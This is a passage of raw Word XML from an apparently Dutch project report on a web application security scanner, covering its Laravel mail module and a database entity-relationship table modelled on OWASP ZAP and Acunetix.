                          <a:ext cx="1079095" cy="2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46BD0" id="Straight Connector 625" o:spid="_x0000_s1026" style="position:absolute;flip:y;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01pt" to="229.15pt,20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5232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F0EE349" wp14:editId="61EFD90A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1831340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1755140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="624" name="Straight Connector 624"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="10795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C6868" id="Straight Connector 624" o:spid="_x0000_s1026" style="position:absolute;flip:y;z-index:252895232;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="144.2pt,138.2pt" to="229.2pt,16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4208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D3BC4DC" wp14:editId="49664CD1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3164205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1068705</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="220980"/>
                <wp:effectExtent l="0" t="0" r="27305" b="33020"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="618" name="Text Box 618"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="633095" cy="22098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B25B72" w14:textId="1C796D36" w:rsidR="002A05E5" w:rsidRPr="00305920" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>M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C4DC" id="Text Box 618" o:spid="_x0000_s1190" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.15pt;margin-top:84.15pt;width:49.85pt;height:17.4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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="55B25B72" w14:textId="1C796D36" w:rsidR="002A05E5" w:rsidRPr="00305920" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Mailable</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93184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FDB9206" wp14:editId="26D27259">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2911475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3015615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="683260"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21680"/>
                    <wp:lineTo x="21600" y="21680"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="614" name="Rectangle 614"/>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CC4D5" id="Rectangle 614" o:spid="_x0000_s1026" style="position:absolute;margin-left:229.25pt;margin-top:237.45pt;width:90pt;height:53.8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0FH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y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9088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FF24CE1" wp14:editId="14411464">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2907030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1410970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="683260"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21680"/>
                    <wp:lineTo x="21600" y="21680"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="612" name="Rectangle 612"/>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337A1" id="Rectangle 612" o:spid="_x0000_s1026" style="position:absolute;margin-left:228.9pt;margin-top:111.1pt;width:90pt;height:53.8pt;z-index:25288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IMwn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w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91136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29C5C3E8" wp14:editId="72798E41">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2912745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2207895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="683260"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21680"/>
                    <wp:lineTo x="21600" y="21680"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="613" name="Rectangle 613"/>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E3DC8" id="Rectangle 613" o:spid="_x0000_s1026" style="position:absolute;margin-left:229.35pt;margin-top:173.85pt;width:90pt;height:53.8pt;z-index:2528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1920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6619BF13" wp14:editId="4AF08E3C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>999490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2440305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="565785" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="43815" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="550" name="Straight Connector 550"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="56578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09781" id="Straight Connector 550" o:spid="_x0000_s1026" style="position:absolute;flip:y;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92.15pt" to="123.2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9872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="573669E9" wp14:editId="098D66AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>494030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2440305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="504825" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="28575" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="547" name="Straight Connector 547"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="50482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8340D" id="Straight Connector 547" o:spid="_x0000_s1026" style="position:absolute;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92.15pt" to="78.6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8848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4415CA28" wp14:editId="3C535038">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>494030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2440305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1076325" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="15875" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21409" y="21600"/>
                    <wp:lineTo x="21409" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="546" name="Rectangle 546"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="10763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7615" id="Rectangle 546" o:spid="_x0000_s1026" style="position:absolute;margin-left:38.9pt;margin-top:192.15pt;width:84.75pt;height:54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" fillcolor="#4472c4 [3204]"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6016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E437626" wp14:editId="10A883EB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>497205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2783840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="441325" cy="342265"/>
                <wp:effectExtent l="0" t="0" r="41275" b="38735"/>
                <wp:wrapNone/>
                <wp:docPr id="583" name="Straight Connector 583"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="441325" cy="342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EE366" id="Straight Connector 583" o:spid="_x0000_s1026" style="position:absolute;flip:x;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19.2pt" to="73.9pt,24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3968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="054F8945" wp14:editId="2BD98106">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1066165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2783840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="502920" cy="346710"/>
                <wp:effectExtent l="0" t="0" r="30480" b="34290"/>
                <wp:wrapNone/>
                <wp:docPr id="582" name="Straight Connector 582"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="502920" cy="346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78E6D" id="Straight Connector 582" o:spid="_x0000_s1026" style="position:absolute;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19.2pt" to="123.5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7040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="300D76F3" wp14:editId="523794ED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>565785</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2099945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="38100" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="584" name="Text Box 584"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="952500" cy="22606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3322E0" w14:textId="2600AE36" w:rsidR="002A05E5" w:rsidRPr="00D34083" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Mail Faca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D76F3" id="Text Box 584" o:spid="_x0000_s1191" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:44.55pt;margin-top:165.35pt;width:75pt;height:17.8pt;z-index:2528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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="203322E0" w14:textId="2600AE36" w:rsidR="002A05E5" w:rsidRPr="00D34083" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Mail Facadé</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88064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="771B49B6" wp14:editId="39592875">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>740410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1750060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="30480" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="586" name="Text Box 586"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="579120" cy="2286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95E7B8" w14:textId="3C6015D6" w:rsidR="002A05E5" w:rsidRPr="00D34083" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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B49B6" id="Text Box 586" o:spid="_x0000_s1192" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58.3pt;margin-top:137.8pt;width:45.6pt;height:18pt;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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6A95E7B8" w14:textId="3C6015D6" w:rsidR="002A05E5" w:rsidRPr="00D34083" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Laravel</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1681777" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="433A8634" wp14:editId="2C71DA9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>302895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1642745</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="1711960"/>
                <wp:effectExtent l="0" t="0" r="25400" b="15240"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21472"/>
                    <wp:lineTo x="21600" y="21472"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="585" name="Rectangle 585"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1524000" cy="171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CF251" id="Rectangle 585" o:spid="_x0000_s1026" style="position:absolute;margin-left:23.85pt;margin-top:129.35pt;width:120pt;height:134.8pt;z-index:251681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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B66B91">
        <w:t>SecurityReport maakt gebru</w:t>
      </w:r>
      <w:r w:rsidR="003679C4">
        <w:t xml:space="preserve">ik van de Laravel Library Mail dat </w:t>
      </w:r>
      <w:r w:rsidR="00B63B0B">
        <w:t>het aanmaken van servicemails</w:t>
      </w:r>
      <w:r w:rsidR="003679C4">
        <w:t xml:space="preserve"> gemakkelijk maakt. Met Mail kunnen er </w:t>
      </w:r>
      <w:r w:rsidR="00981C3F">
        <w:t>modules</w:t>
      </w:r>
      <w:r w:rsidR="003679C4">
        <w:t xml:space="preserve"> ge</w:t>
      </w:r>
      <w:r w:rsidR="00124337">
        <w:t>maakt worden van servicemails</w:t>
      </w:r>
      <w:r w:rsidR="003679C4">
        <w:t xml:space="preserve"> zoals de registratie e-mail.</w:t>
      </w:r>
      <w:r w:rsidR="00981C3F">
        <w:t xml:space="preserve"> De e-mail modules worden </w:t>
      </w:r>
      <w:r w:rsidR="00D55E15">
        <w:t>verlengd</w:t>
      </w:r>
      <w:r w:rsidR="00981C3F">
        <w:t xml:space="preserve"> (extends) met</w:t>
      </w:r>
      <w:r w:rsidR="00D55E15">
        <w:t xml:space="preserve"> een Mailable Klasse waarmee een e-mail opgebouwd kan worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F245E1E" w14:textId="2BCA7B57" w:rsidR="003679C4" w:rsidRDefault="00981C3F" w:rsidP="003679C4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9328E">
        <w:t>Figuur 4.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E09FAF" w14:textId="77777777" w:rsidR="00814E18" w:rsidRDefault="00814E18" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555AE579" w14:textId="77777777" w:rsidR="00814E18" w:rsidRDefault="00814E18" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F82748D" w14:textId="2F2AC69E" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253212672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4916B6FC" wp14:editId="5AE506BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896794</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-718985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="801" name="Rectangle 8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1AC40" id="Rectangle 801" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-56.55pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE4846" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32603974" w14:textId="767CDCAD" w:rsidR="005A7696" w:rsidRPr="00E7597A" w:rsidRDefault="00C710D1" w:rsidP="00C710D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5.6 </w:t>
      </w:r>
      <w:r w:rsidR="005A7696" w:rsidRPr="00E7597A">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088D81B" w14:textId="0DA382B8" w:rsidR="005A7696" w:rsidRPr="009103AF" w:rsidRDefault="005A7696" w:rsidP="005A7696">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2D2B">
        <w:t xml:space="preserve">Selectieve data dat de </w:t>
      </w:r>
      <w:r>
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2D2B">
        <w:t xml:space="preserve"> genereerd wordt opgeslagen in de database. De datastructuur is gebaseerd op mijn vooronderzoek naar de datastructuren die OWASP ZAP en Acunetix hanteren</w:t>
      </w:r>
      <w:r w:rsidR="001B48B6">
        <w:t xml:space="preserve"> (H 3)</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2D2B">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Uit dat onderzoek heb ik alleen de essentiële entiteiten en attributen eruit kunnen halen. Tijdens het ontwikkelen zijn er vele aanpassingen gedaan aan de datastructuur om de data die de webapplica</w:t>
      </w:r>
      <w:r w:rsidR="003D22A7">
        <w:t>tie scanner te accommoderen.</w:t>
      </w:r>
      <w:r w:rsidR="00820CCF">
        <w:t xml:space="preserve"> Voor de database model verwijs ik u naar de Bijlage.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3020"/>
        <w:gridCol w:w="3020"/>
        <w:gridCol w:w="3020"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A7696" w14:paraId="655EBA1B" w14:textId="77777777" w:rsidTr="00C2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749CC" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Entiteit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A36BD40"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Relatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6107052F"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Entiteit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="1349F546"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169C6F" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Customer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="447C4D7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FB52499"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Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="492B243F" w14:textId="77777777" w:rsidTr="00C255C6">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1753434B" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="704944F2"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45E6FAAA"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Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="18FF6B1E"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1A7296" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CAA94F8"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721DBF0"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="49D10806" w14:textId="77777777" w:rsidTr="00C255C6">
        <w:trPr>
          <w:trHeight w:val="209"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19BD2B14" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092A553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812F1BF"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Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="70D2CAC6"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732DADA3" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A6B2FC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3D152FAD"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 Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="674CD6D8"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61BA0058" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37AC17E5"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601D838E"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Param (parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="53604A7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9DB0AC4" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3338C311"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23A0300E"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Scan Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="15202B0C"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3016D9EE" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B35999"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681302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Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7696" w14:paraId="4F7B001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E2022A9" w14:textId="77777777" w:rsidR="005A7696" w:rsidRDefault="005A7696" w:rsidP="0040531B">
            <w:r>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
